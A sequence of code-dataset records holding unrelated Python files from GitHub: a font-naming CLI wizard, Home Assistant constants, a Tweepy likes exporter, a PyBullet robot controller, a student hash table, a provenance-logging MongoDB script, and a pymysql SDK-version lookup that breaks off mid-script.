is_flag=True,\n help=\"Use '-RegularItalic' instead of '-Italic' in name ID 6.\")\n@click.option('-kr', '--keep-regular', is_flag=True,\n help=\"Use '-RegularItalic' instead of '-Italic' in name ID 6 and 'Regular Italic' instead of 'Italic' in name IDs 2 (Mac only), 4, 17 and 18.\")\n@click.option('-offn', '--old-full-font-name', is_flag=True,\n help=\"Full font name in Microsoft name table is generally a combination of name IDs 1 and 2 or 16 and 17. With this option active, it will be equal to name ID 6 (PostScriptName).\")\n@click.option('-cff', '--fix-cff', is_flag=True,\n help=\"fontNames, FullName, FamilyName and Weight values in the 'CFF' table will be recalculated.\")\n@click.option('-o', '--output-dir', type=click.Path(file_okay=False, resolve_path=True), default=None,\n help='Specify the output directory where the output files are to be saved. If output_directory doesn\\'t exist, it will be created. If not specified, files are saved to the same folder.')\n@click.option('--recalc-timestamp/--no-recalc-timestamp', default=False, show_default=True,\n help='Keep the original font \\'modified\\' timestamp (head.modified) or set it to current time. By default, original timestamp is kept.')\n@click.option('--overwrite/--no-overwrite', default=True, show_default=True,\n help='Overwrite existing output files or save them to a new file (numbers are appended at the end of file name). 
By default, files are overwritten.')\ndef recalc_names(\n input_path,\n config_file,\n linked_styles,\n exclude_namerecords,\n shorten_width,\n shorten_weight,\n shorten_italic,\n fix_cff,\n super_family,\n alt_uid,\n regular_italic,\n keep_regular,\n old_full_font_name,\n output_dir,\n recalc_timestamp,\n overwrite\n):\n \"\"\"\n Recalculates namerecords according to the values stored in the data.csv file.\n \"\"\"\n\n files = getFontsList(input_path)\n if len(files) == 0:\n click.secho('\\nNo fonts found.', fg='red')\n sys.exit()\n\n if not config_file:\n config_file = getConfigPath(input_path)\n\n # If config.json doesn't exist, it has to be created before.\n if not os.path.exists(config_file):\n configHandler(config_file).resetConfig()\n click.secho('\\n{} didn\\'t exist and has been created'.format(\n config_file), fg='yellow')\n\n config = configHandler(config_file).getConfig()\n\n italics = config['italics']\n italics.sort(key=len)\n\n csv_file = getCsvPath(input_path)\n if not os.path.exists(csv_file):\n csvHandler(csv_file).resetCSV(config_file=config_file)\n data = csvHandler(csv_file).getData()\n\n # Checks if the file name is present in the CSV data. If the file name\n # is not present, the file is removed from the list of files and will\n # not be processed.\n csv_filenames = [row['file_name'] for row in data]\n files = [f for f in files if os.path.basename(f) in csv_filenames]\n\n shorten_width = [int(i) for i in shorten_width]\n shorten_weight = [int(i) for i in shorten_weight]\n shorten_italic = [int(i) for i in shorten_italic]\n exclude_namerecords = [int(i) for i in exclude_namerecords]\n\n # We convert the linked_styles tuple to a list and then sort it.\n linked_styles = tuple(set(linked_styles))\n linked_styles = list(linked_styles)\n linked_styles.sort()\n\n for f in files:\n try:\n font = TTFont(f, recalcTimestamp=recalc_timestamp)\n font_data = {}\n for row in data:\n if str(row['file_name']) == os.path.basename(f):\n font_data = row\n\n pyFont(font).recalcNames(\n font_data, italics,\n linked_styles=linked_styles, namerecords_to_ignore=exclude_namerecords,\n shorten_weight=shorten_weight, shorten_width=shorten_width, shorten_italic=shorten_italic,\n alt_uid=alt_uid, fixCFF=fix_cff, isSuperFamily=super_family, regular_italic=regular_italic, keep_regular=keep_regular, old_full_font_name=old_full_font_name)\n\n output_file = makeOutputFileName(\n f, outputDir=output_dir, overWrite=overwrite)\n font.save(output_file)\n click.secho('{} saved'.format(output_file), fg='green')\n except:\n click.secho('{} is not a valid font'.format(f), fg='red')\n pass\n\n\ncli = click.CommandCollection(sources=[editCFG, editCSV, initCFG, initCSV, recalcCSV, recalcNames], help=\"\"\"\nA set of tools to correctly compile the name table and set proper values\nfor usWeightClass, usWidthClass, bold and italic bits.\n\nThe process requires a JSON configuration file and a CSV file that will be\nused to fix the fonts. 
Both files can be automatically created and\nthen edited manually or using the integrated command line editor.\n\n1) The JSON configuration file.\n\nThe 'config.json' file contains the desired style names to pair with each\nusWidthClass and usWeightClass values of the family, as well as the italic\nliterals:\n\n\\b\n{\n \"italics\": [\"It\", \"Italic\"],\n\\b\n \"weights\": {\n \"250\": [\"Th\", \"Thin\"],\n \"275\": [\"ExLt\", \"ExtraLight\"],\n ...\n },\n\\b\n \"widths\": {\n \"1\": [\"Cm\", \"Compressed\"],\n \"2\": [\"ExCn\", \"ExtraCondensed\"],\n ...\n }\n}\n\nUnless you have previously created a configuration file and want to reuse\nit, you need to create a standard configuration file and customize it if\nneeded.\n\n ftcli wizard init-cfg INPUT_PATH\n\nThe above command will create a file named 'config.json' in the INPUT_PATH\nfolder (or parent folder if INPUT_PATH is a file).\n\nOnce the configuration file has been created, you may need to edit it.\n\n ftcli wizard edit-cfg CONFIG_FILE\n\nValues contained in the configuration file will be used to fill the data.csv\nfile in the next steps.\n\n2) The CSV data file.\n\nThe final data.csv file will contain the desired style names, family name,\nitalic bits, usWidthClass and usWeightClass values. Once properly filled,\nthe values contained in this file will be written to the fonts.\n\nIt contains 10 columns:\n\n\\b\nfile_name\nis_bold \nis_italic\nuswidthclass\nwdt\nwidth\nusweightclass\nwgt\nweight\nfamily_name\n\nThe 'is_bold' column is present only for completeness, but its values will be\nignored. A font will be set as bold if and only if, during the names recalculation,\nthe user chooses to use linked styles (-ls / --linked-styles option).\n\nThe 'wdt' and 'width' columns contain the short and long literals for the width\nstyle names (for example: Cn; Condensed).\n\nThe 'wgt' and 'weight' columns contain the short and long literals for the weight\nstyle names (for example: Lt, Light).\n\nThe user chooses the namerecords in which to write the long or short literals.\n\nThe 'data.csv' file can be created using the following command:\n\n ftcli wizard init-csv INPUT_PATH\n\nAt this point, the CSV file will contain a representation of the actual state of the\nfonts (the family_name column will contain values of nameID 16, or nameID 1 if 16 is\nnot present). 
It can be edited manually, using the 'ftcli wizard edit-csv' command, and\nalso automatically recalculated using the 'ftcli wizard recalc-csv' command.\n\nThe 'ftcli wizard recalc-csv' command will recalculate style names, italic bits, width\nand weight style names according to the values contained in the JSON configuration file.\n\nWhen the 'data.csv' file contains the desired values, these values can be applied to fonts\nrunning the 'ftcli wizard recalc-names' command (see 'ftcli wizard recalc-names --help' for\nmore information).\n\n \"\"\")\n","repo_name":"alerque/ftCLI","sub_path":"ftcli/commands/ftcli_wizard.py","file_name":"ftcli_wizard.py","file_ext":"py","file_size_in_byte":18181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"34764157516","text":"\"\"\"Constants for the Vconnex integration.\"\"\"\n\nfrom __future__ import annotations\n\nfrom homeassistant.components.binary_sensor import DOMAIN as BINARY_SENSOR_DOMAIN\nfrom homeassistant.components.cover import DOMAIN as COVER_DOMAIN\nfrom homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN\nfrom homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN\n\nDOMAIN = \"vconnex_cc\"\nDOMAIN_NAME = \"Vconnex CC\"\nPROJECT_CODE = \"HASS\"\n\nPLATFORMS = [\n SWITCH_DOMAIN,\n SENSOR_DOMAIN,\n BINARY_SENSOR_DOMAIN,\n COVER_DOMAIN,\n]\n\nDEFAULT_ENDPOINT = \"https://hass-api.vconnex.vn\"\n\nCONF_CLIENT_ID = \"client_id\"\nCONF_CLIENT_SECRET = \"client_secret\"\nCONF_USER_ID = \"user_id\"\nCONF_PROJECT_NAME = \"project_name\"\nCONF_USER_NAME = \"user_name\"\nCONF_PASSWORD = \"password\"\nCONF_ENDPOINT = \"endpoint\"\nCONF_COUNTRY = \"country\"\n\n\nclass DispatcherSignal:\n \"\"\"DispatcherSignal.\"\"\"\n\n DEVICE_ADDED = f\"{DOMAIN}.device_added\"\n DEVICE_UPDATED = f\"{DOMAIN}.device_updated\"\n DEVICE_REMOVED = f\"{DOMAIN}.device_removed\"\n\n\nclass CommandName:\n \"\"\"Device command name.\"\"\"\n\n SET_DATA = \"CmdSetData\"\n GET_DATA = \"CmdGetData\"\n\n\nclass ParamType:\n \"\"\"Device Param Type.\"\"\"\n\n NONE = 0\n ON_OFF = 1\n OPEN_CLOSE = 2\n YES_NO = 3\n ALERT = 4\n MOVE_NOMOVE = 5\n RAW_VALUE = 6\n\n\nPARAM_TYPES = [\n ParamType.NONE,\n ParamType.ON_OFF,\n ParamType.OPEN_CLOSE,\n ParamType.YES_NO,\n ParamType.ALERT,\n ParamType.MOVE_NOMOVE,\n ParamType.RAW_VALUE,\n]\n","repo_name":"vconnex/vconnex-home-assistant","sub_path":"custom_components/vconnex_cc/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3173007400","text":"import tweepy\nimport csv\n\n# Replace these with your own Twitter API keys and access tokens\nconsumer_key = 'your_consumer_key'\nconsumer_secret = 'your_consumer_secret'\naccess_token = 'your_access_token'\naccess_token_secret = 'your_access_token_secret'\n\n# Authenticate with the Twitter API\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\n\ndef get_all_likes(api):\n likes = []\n for status in tweepy.Cursor(api.favorites).items():\n tweet = {\n 'id': status.id_str,\n 'created_at': status.created_at,\n 'text': status.text,\n 'user': status.user.screen_name,\n }\n likes.append(tweet)\n return likes\n\n\ndef save_likes_to_csv(likes, filename='likes.csv'):\n with open(filename, 'w', newline='', encoding='utf-8') as csvfile:\n fieldnames = ['id', 'created_at', 'text', 'user']\n writer = csv.DictWriter(csvfile, 
fieldnames=fieldnames)\n writer.writeheader()\n for like in likes:\n writer.writerow(like)\n\n\nif __name__ == \"__main__\":\n likes = get_all_likes(api)\n save_likes_to_csv(likes)\n","repo_name":"nt92/memex","sub_path":"gpt-for-me/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"67"} +{"seq_id":"25289808044","text":"'''\n\n\nWhat are lambda expressions?\n• They are anonymous functions.\nlambda parameters : expression\n\n'''\n\n\ndef ordeno3(usuarios):\n \"\"\" We use sorted with a lambda expression\"\"\"\n return sorted(usuarios, key=lambda usuario: usuario[0])\nusuarios = [\n('JonY BoY', 'Nivel3', 15),\n('1962', 'Nivel1', 12),\n('caike', 'Nivel2', 1020),\n('Straka^', 'Nivel2', 1020),\n]\nprint(ordeno3(usuarios))\n\nprint('-'*50)\n\nlista_de_acciones = [lambda x: x * 2, lambda x: x * 3]\nprint(f'the lambda data types are {type(lista_de_acciones[0])}')\n\nparam = 4\nfor accion in lista_de_acciones:\n print(accion(param))","repo_name":"facundoaquino/python-practice","sub_path":"lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30369964500","text":"\nimport pybullet as p\nimport time\n\n# open the GUI\np.connect(p.GUI)\n\n# load files and place them at the offsets\nturtle = p.loadURDF(\"urdf/most_simple_turtle.urdf\",[0,0,0])\nplane = p.loadURDF(\"urdf/plane_box.urdf\")\nbox1 = p.loadURDF(\"urdf/box.urdf\", [1,0,0])\nbox2 = p.loadURDF(\"urdf/box.urdf\", [1,1,0])\n\n# enable real time simulation\np.setRealTimeSimulation(1)\n\n# define gravity\np.setGravity(0,0,-10)\n\n# for debug print out the joints of the turtle\nfor j in range (p.getNumJoints(turtle)):\n\tprint(p.getJointInfo(turtle,j))\n\t\nforward=0\nturn=0\nwhile (1):\n\n\ttime.sleep(1./240.)\n\tkeys = p.getKeyboardEvents()\n\t\n\tleftWheelVelocity=0\n\trightWheelVelocity=0\n\tspeed=10\n\t\n\tfor k,v in keys.items():\n\n\t\tif (k == p.B3G_RIGHT_ARROW and (v&p.KEY_WAS_TRIGGERED)):\n\t\t\tturn = -0.5\n\t\tif (k == p.B3G_RIGHT_ARROW and (v&p.KEY_WAS_RELEASED)):\n\t\t\tturn = 0\n\t\tif (k == p.B3G_LEFT_ARROW and (v&p.KEY_WAS_TRIGGERED)):\n\t\t\tturn = 0.5\n\t\tif (k == p.B3G_LEFT_ARROW and (v&p.KEY_WAS_RELEASED)):\n\t\t\tturn = 0\n\n\t\tif (k == p.B3G_UP_ARROW and (v&p.KEY_WAS_TRIGGERED)):\n\t\t\tforward=1\n\t\tif (k == p.B3G_UP_ARROW and (v&p.KEY_WAS_RELEASED)):\n\t\t\tforward=0\n\t\tif (k == p.B3G_DOWN_ARROW and (v&p.KEY_WAS_TRIGGERED)):\n\t\t\tforward=-1\n\t\tif (k == p.B3G_DOWN_ARROW and (v&p.KEY_WAS_RELEASED)):\n\t\t\tforward=0\n\n\trightWheelVelocity+= (forward+turn)*speed\n\tleftWheelVelocity += (forward-turn)*speed\n\t\n\tp.setJointMotorControl2(turtle,0,p.VELOCITY_CONTROL,targetVelocity=leftWheelVelocity,force=1000)\n\tp.setJointMotorControl2(turtle,1,p.VELOCITY_CONTROL,targetVelocity=rightWheelVelocity,force=1000)\n","repo_name":"assadollahi/pyBulletIntro","sub_path":"turtleKeyboardMove.py","file_name":"turtleKeyboardMove.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"1338739300","text":"# Please see instructions.pdf for the description of this problem.\r\nfrom fixed_size_array import FixedSizeArray\r\nfrom cs5112_hash import cs5112_hash1\r\n\r\n# Implementation of a node in a singly linked list.\r\n# DO NOT EDIT THIS CLASS\r\nclass SLLNode:\r\n def __init__(self, value, next_node=None):\r\n self.value = value\r\n self.next_node = 
next_node\r\n\r\n def set_next(self, node):\r\n self.next_node = node\r\n\r\n def get_next(self):\r\n return self.next_node\r\n\r\n def set_value(self, value):\r\n self.value = value\r\n\r\n def get_value(self):\r\n return self.value\r\n\r\n# An implementation of a hash table that uses chaining to handle collisions.\r\nclass HashTable:\r\n def __init__(self, initial_size=10, load_factor=.75):\r\n # DO NOT EDIT THIS CONSTRUCTOR\r\n if (initial_size < 0) or (load_factor <= 0) or (load_factor > 1):\r\n raise Exception(\"size must be greater than zero, and load factor must be between 0 and 1\")\r\n self.array_size = initial_size\r\n self.load_factor = load_factor\r\n self.item_count = 0\r\n self.array = FixedSizeArray(initial_size)\r\n\r\n # Inserts the `(key, value)` pair into the hash table, overwriting any value\r\n # previously associated with `key`.\r\n # Note: Neither `key` nor `value` may be None (an exception will be raised)\r\n def insert(self, key, value):\r\n # YOUR CODE HERE\r\n if key == None:\r\n raise Exception('Key cannot be None!')\r\n if value == None:\r\n raise Exception('Value cannot be None!')\r\n k = cs5112_hash1(key)%self.array_size\r\n pointer = self.array.get(k)\r\n node = SLLNode((key,value))\r\n if pointer==None:\r\n self.array.set(k, node)\r\n else:\r\n # walk the whole chain (including the last node) so an existing\r\n # key is overwritten instead of being appended a second time\r\n while True:\r\n if pointer.get_value()[0]== key:\r\n pointer.set_value((key,value))\r\n return\r\n if pointer.get_next()== None:\r\n break\r\n pointer = pointer.get_next()\r\n pointer.set_next(node)\r\n self.item_count += 1\r\n if self.item_count/self.array_size >= self.load_factor:\r\n self._resize_array()\r\n\r\n # Returns the value associated with `key` in the hash table, or None if no\r\n # such value is found.\r\n # Note: `key` may not be None (an exception will be raised)\r\n def get(self, key):\r\n # YOUR CODE HERE\r\n if key == None:\r\n raise Exception('Key cannot be None!')\r\n k = cs5112_hash1(key)%self.array_size\r\n start = self.array.get(k)\r\n while start != None and start.get_value()!= None:\r\n if start.get_value()[0] == key:\r\n return start.get_value()[1]\r\n start = start.get_next()\r\n return None\r\n\r\n
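 # (Editor's note, added:) with separate chaining a lookup scans a single\r\n # bucket's list: expected O(1 + load factor) work under uniform hashing,\r\n # but O(n) in the worst case when every key hashes to the same bucket.\r\n\r\n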
 # Removes the `(key, value)` pair matching the given `key` from the map, if it\r\n # exists. If such a pair exists in the map, the return value will be the value\r\n # that was removed. If no such value exists, the method will return None.\r\n # Note: `key` may not be None (an exception will be raised)\r\n def remove(self, key):\r\n # YOUR CODE HERE\r\n if key == None:\r\n raise Exception('Key cannot be None!')\r\n k = cs5112_hash1(key)%self.array_size\r\n prev = None\r\n curr = self.array.get(k)\r\n while curr != None:\r\n if curr.get_value()[0]== key:\r\n if prev == None:\r\n # removing the head node: the bucket itself must be updated\r\n self.array.set(k, curr.get_next())\r\n else:\r\n prev.set_next(curr.get_next())\r\n self.item_count-=1\r\n return curr.get_value()[1]\r\n prev = curr\r\n curr = curr.get_next()\r\n return None\r\n\r\n # Returns the number of elements in the hash table.\r\n def size(self):\r\n # YOUR CODE HERE\r\n return self.item_count\r\n\r\n # Internal helper function for resizing the hash table's array once the ratio\r\n # of stored mappings to array size exceeds the specified load factor.\r\n def _resize_array(self):\r\n # YOUR CODE HERE\r\n orgsize = self.array_size\r\n orgarray = self.array\r\n\r\n self.array_size *= 2\r\n self.array = FixedSizeArray(self.array_size)\r\n self.item_count = 0\r\n\r\n for i in range(orgsize):\r\n node = orgarray.get(i)\r\n # re-insert every (key, value) pair stored in this bucket's chain\r\n while node != None:\r\n self.insert(node.get_value()[0], node.get_value()[1])\r\n node = node.get_next()\r\n\r\n\r\n # Internal helper function for accessing the array underlying the hash table.\r\n def _get_array(self):\r\n # DO NOT EDIT THIS FUNCTION\r\n return self.array\r\n","repo_name":"ziyuqiu/Algo","sub_path":"HW2/hashtable_chaining.py","file_name":"hashtable_chaining.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24329838505","text":"from setuptools import setup\n\nimport os\nimport sys\n\nname = 'djangorestframework-flatbuffers'\npackage = 'rest_framework_flatbuffers'\ndescription = 'Flatbuffer serialization for Django Rest Framework'\nurl = 'https://github.com/sideshowdave7/django-rest-framework-flatbuffers'\nauthor = 'David Hurst'\nauthor_email = 'sideshowdave7@gmail.com'\nlicense = 'BSD'\ninstall_requires = ['djangorestframework',\n 'flatbuffers'\n ]\n\n\ndef get_packages(package):\n \"\"\"\n Return root package and all sub-packages.\n \"\"\"\n return [dirpath\n for dirpath, dirnames, filenames in os.walk(package)\n if os.path.exists(os.path.join(dirpath, '__init__.py'))]\n\n\ndef get_package_data(package):\n \"\"\"\n Return all files under the root package, that are not in a\n package themselves.\n \"\"\"\n walk = [(dirpath.replace(package + os.sep, '', 1), filenames)\n for dirpath, dirnames, filenames in os.walk(package)\n if not os.path.exists(os.path.join(dirpath, '__init__.py'))]\n\n filepaths = []\n for base, filenames in walk:\n filepaths.extend([os.path.join(base, filename)\n for filename in filenames])\n return {package: filepaths}\n\n\nif sys.argv[-1] == 'publish':\n os.system(\"python setup.py sdist upload\")\n args = {'version': '0.1'}\n print(\"You probably want to also tag the version now:\")\n print(\" git tag -a %(version)s -m 'version %(version)s'\" % args)\n print(\" git push --tags\")\n sys.exit()\n\nsetup(\n name=name,\n version='0.1',\n url=url,\n license=license,\n description=description,\n author=author,\n author_email=author_email,\n packages=get_packages(package),\n package_data=get_package_data(package),\n install_requires=install_requires,\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Environment :: Web Environment\",\n \"Intended Audience :: 
Developers\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Framework :: Django\",\n ],\n)\n","repo_name":"sideshowdave7/django-rest-framework-flatbuffers","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"3205421759","text":"from tkinter import Menu\n\n\nclass MenuSite:\n def __init__(self, root, toolbar_site):\n self.root = root\n self.sub_menus = {}\n self.toolbar = toolbar_site\n self.root_menu = Menu(self.root)\n self.root.config(menu=self.root_menu)\n\n def add_item(self, menu_label, item, action):\n if menu_label in self.sub_menus:\n self.sub_menus[menu_label].add_command(label=item, command=action)\n else:\n sub_menu = Menu(self.root_menu) # sub menu\n self.root_menu.add_cascade(label=menu_label, menu=sub_menu)\n sub_menu.add_command(label=item, command=action)\n self.sub_menus[menu_label] = sub_menu\n","repo_name":"Phiponacci/crypto-app","sub_path":"ui/menu_system.py","file_name":"menu_system.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"44258735852","text":"import json\nimport datetime\nimport dml\nimport prov.model\nimport provenance\nimport uuid\nimport sys\n\n#auth\nclient = dml.pymongo.MongoClient()\nrepo = client.repo\nrepo.authenticate('linshan_luoty','linshan_luoty')\nauth = json.loads(open(sys.argv[1]).read())\n\nzip_location_crimes_db\t= repo['linshan_luoty'+'.'+'zip_location_crimes']\nzip_avg_earnings_db = repo['linshan_luoty'+'.'+'zip_avg_earnings']\n\nstartTime = datetime.datetime.now()\n\nzip_location_crimes = zip_location_crimes_db.find({},{\n\t'_id': False,\n\t'zip': True,\n\t'crimes': True,\n\t'longitude': True,\n\t'latitude': True,\n\t'region': True,\n\t})\n\nzip_location_crimes_earnings = []\nfor document in zip_location_crimes:\n\tavg_earning = zip_avg_earnings_db.find_one({'zip': document['zip']}, {'_id': False, 'avg_earning': True})\n\tif avg_earning is None: \n\t\tdocument['avg_earning'] = 0\n\telse:\n\t\tdocument['avg_earning'] = avg_earning['avg_earning']\n\tzip_location_crimes_earnings.append(document)\n\n# export zip_location_crimes_earnings to JSON\nf = open('zip_location_crimes_earnings.json','w')\nf.write(json.dumps(zip_location_crimes_earnings, indent=4))\nf.close()\n\n# save it to a permanent folder\nrepo.dropPermanent(\"zip_location_crimes_earnings\")\nrepo.createPermanent(\"zip_location_crimes_earnings\")\nrepo['linshan_luoty'+'.'+'zip_location_crimes_earnings'].insert_many(zip_location_crimes_earnings)\n\nzip_location_crimes_earnings_sorted = repo['linshan_luoty'+'.'+'zip_location_crimes_earnings'].find({},{\n\t'_id': False,\n\t'zip': True,\n\t'crimes': True,\n\t'longitude': True,\n\t'latitude': True,\n\t'region': True,\n\t'avg_earning': True,\n\t}).sort([('avg_earning', dml.pymongo.ASCENDING)])\n\nf = open('zip_location_crimes_earnings_sorted.json','w')\nf.write(json.dumps(list(zip_location_crimes_earnings_sorted), indent=4))\nf.close()\n\nendTime = datetime.datetime.now()\n\n# Create the provenance document 
describing everything happening\n# in this script. Each run of the script will generate a new\n# document describing that invocation event. This information\n# can then be used on subsequent runs to determine dependencies\n# and \"replay\" everything. The old documents will also act as a\n# log.\ndoc = provenance.init()\ndoc.add_namespace('alg', 'https://data-mechanics.s3.amazonaws.com/linshan_luoty/algorithm/') # The scripts in / format.\ndoc.add_namespace('dat', 'https://data-mechanics.s3.amazonaws.com/linshan_luoty/data/') # The data sets in / format.\ndoc.add_namespace('ont', 'https://data-mechanics.s3.amazonaws.com/ontology#') # 'Extension', 'DataResource', 'DataSet', 'Retrieval', 'Query', or 'Computation'.\ndoc.add_namespace('log', 'https://data-mechanics.s3.amazonaws.com/log#') # The event log.\ndoc.add_namespace('bdp', 'https://data.cityofboston.gov/resource/')\n\nthis_script = doc.agent('alg:merge_zip_crime_earnings', {prov.model.PROV_TYPE:prov.model.PROV['SoftwareAgent'], 'ont:Extension':'py'})\n\nzip_location_crimes = doc.entity('dat:zip_location_crimes', {prov.model.PROV_LABEL:'Zip Location Crimes', prov.model.PROV_TYPE:'ont:DataSet'})\nzip_avg_earning = doc.entity('dat:zip_avg_earnings', {prov.model.PROV_LABEL:'Zips Average Earnings', prov.model.PROV_TYPE:'ont:DataSet'})\n\nmerge_zip_crime_earnings = doc.activity('log:a'+str(uuid.uuid4()), startTime, endTime, {prov.model.PROV_LABEL: \"Merge zips, crimes, locations, and earnings.\"})\ndoc.wasAssociatedWith(merge_zip_crime_earnings, this_script)\ndoc.usage(merge_zip_crime_earnings, zip_location_crimes, startTime, None,\n {prov.model.PROV_TYPE:'ont:Computation'\n }\n )\ndoc.usage(merge_zip_crime_earnings, zip_avg_earning, startTime, None,\n {prov.model.PROV_TYPE:'ont:Computation'\n }\n )\n\nzip_location_crimes_earnings = doc.entity('dat:zip_location_crimes_earnings', {prov.model.PROV_LABEL:'Zips with Crime and Earnings', prov.model.PROV_TYPE:'ont:DataSet'})\ndoc.wasAttributedTo(zip_location_crimes_earnings, this_script)\ndoc.wasGeneratedBy(zip_location_crimes_earnings, merge_zip_crime_earnings, endTime)\ndoc.wasDerivedFrom(zip_location_crimes_earnings, zip_location_crimes, merge_zip_crime_earnings, merge_zip_crime_earnings, merge_zip_crime_earnings)\ndoc.wasDerivedFrom(zip_location_crimes_earnings, zip_avg_earning, merge_zip_crime_earnings, merge_zip_crime_earnings, merge_zip_crime_earnings)\n\nrepo.record(doc.serialize()) # Record the provenance document.\nprovenance.update(doc)\nprint(doc.get_provn())\n\t\nrepo.logout()\n","repo_name":"data-mechanics/course-2016-spr-proj","sub_path":"linshan_luoty/merge_zip_crime_earnings.py","file_name":"merge_zip_crime_earnings.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"23677986866","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport pymysql\nimport os\nimport linecache\nimport re\nimport functools\n\n# open the database connection\ndb = pymysql.connect(\"localhost\",\"root\",\"ljh@123456\",\"sdkdatabase\",unix_socket=\"/tmp/mysql.sock\")\n# create the cursor object\ncursor = db.cursor()\n\ndef version_cmp(a, b):\n\tif(a[0] > b[0]):\n\t\treturn 1\n\telse:\n\t\treturn -1\n\ndef FindProperty(property_name, interface_name, version_low_limit, version_up_limit, version_id, version_range, super_interface_names):\n\tif(interface_name == \"NSObject\"):\n\t\tprint(\"back to root\")\n\telse:\n\t\tmysql_1 = \"SELECT super_interface_name, version_id FROM interface_data_table where interface_name = '%s' ORDER BY super_interface_name, CONVERT(version_id,DECIMAL(12,1))\" % interface_name\n\t\ttry:\n\t\t\tcursor.execute(mysql_1)\n\t\t\tresults = cursor.fetchall()\n\t\t\tif(len(results) > 0):\n\t\t\t\tsuper_interface_dic = []\n\t\t\t\ttemp_name = results[0][0]\n\t\t\t\ttemp_version = results[0][1]\n\t\t\t\tsuper_interface_dic.append([results[0][0],results[0][1]])\n\t\t\t\tcount = 0\n\t\t\t\tfor row in results:\n\t\t\t\t\tif(row[0] != temp_name):\n\t\t\t\t\t\tsuper_interface_dic[count].append(temp_version)\n\t\t\t\t\t\tsuper_interface_dic.append([row[0],row[1]])\n\t\t\t\t\t\ttemp_name = row[0]\n\t\t\t\t\t\tcount = count + 1\n\t\t\t\t\ttemp_version = row[1]\n\t\t\t\tsuper_interface_dic[count].append(temp_version)\n\t\t\t\t#print(super_interface_dic)\n\t\t\t\tfor dic_member in super_interface_dic:\n\t\t\t\t\tprint(dic_member)\n\t\t\t\t\tif(float(dic_member[1]) <= float(version_up_limit) and float(version_low_limit) <= float(dic_member[2])):\n\t\t\t\t\t\ttemp_inherit_range = [max(float(dic_member[1]),float(version_low_limit)),min(float(dic_member[2]),float(version_up_limit))]\n\t\t\t\t\t\tif(float(version_id) <= float(temp_inherit_range[1])):\n\t\t\t\t\t\t\tprint(temp_inherit_range)\n\t\t\t\t\t\t\tcheck_again_sql = \"SELECT * FROM property_data_table WHERE property_name = '%s' AND interface_name = '%s' ORDER BY CONVERT(version_id,DECIMAL(12,1))\" % (property_name, dic_member[0])\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tcursor.execute(check_again_sql)\n\t\t\t\t\t\t\t\tresults = cursor.fetchall()\n\t\t\t\t\t\t\t\tif(len(results) > 0):\n\t\t\t\t\t\t\t\t\tprint(\"find it in super super interface\")\n\t\t\t\t\t\t\t\t\tif(float(results[0][4]) <= float(temp_inherit_range[1]) and float(temp_inherit_range[0]) <= float(results[len(results)-1][4])):\n\t\t\t\t\t\t\t\t\t\ttemp_version_range = [max(float(results[0][4]),float(temp_inherit_range[0])),min(float(results[len(results)-1][4]), float(temp_inherit_range[1]))]\n\t\t\t\t\t\t\t\t\t\tversion_range.append(temp_version_range)\n\t\t\t\t\t\t\t\t\t\tsuper_interface_names.append(dic_member[0])\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t# pass super_interface_names down the recursion too (it was missing, causing a TypeError)\n\t\t\t\t\t\t\t\t\tFindProperty(property_name, dic_member[0], temp_inherit_range[0], temp_inherit_range[1], version_id, version_range, super_interface_names)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tprint(\"find property error 2\")\n\t\texcept:\n\t\t\tprint(\"find property error 1\")\n
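\n# Hedged aside (added example, not part of the original script): version_cmp is an\n# old-style comparator; PropertyCheck below adapts it for sorted() with\n# functools.cmp_to_key, e.g.\n# sorted([[2011.0, 2016.0], [2006.0, 2016.0]], key=functools.cmp_to_key(version_cmp))\n# returns [[2006.0, 2016.0], [2011.0, 2016.0]] (ranges ordered by start year).\n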
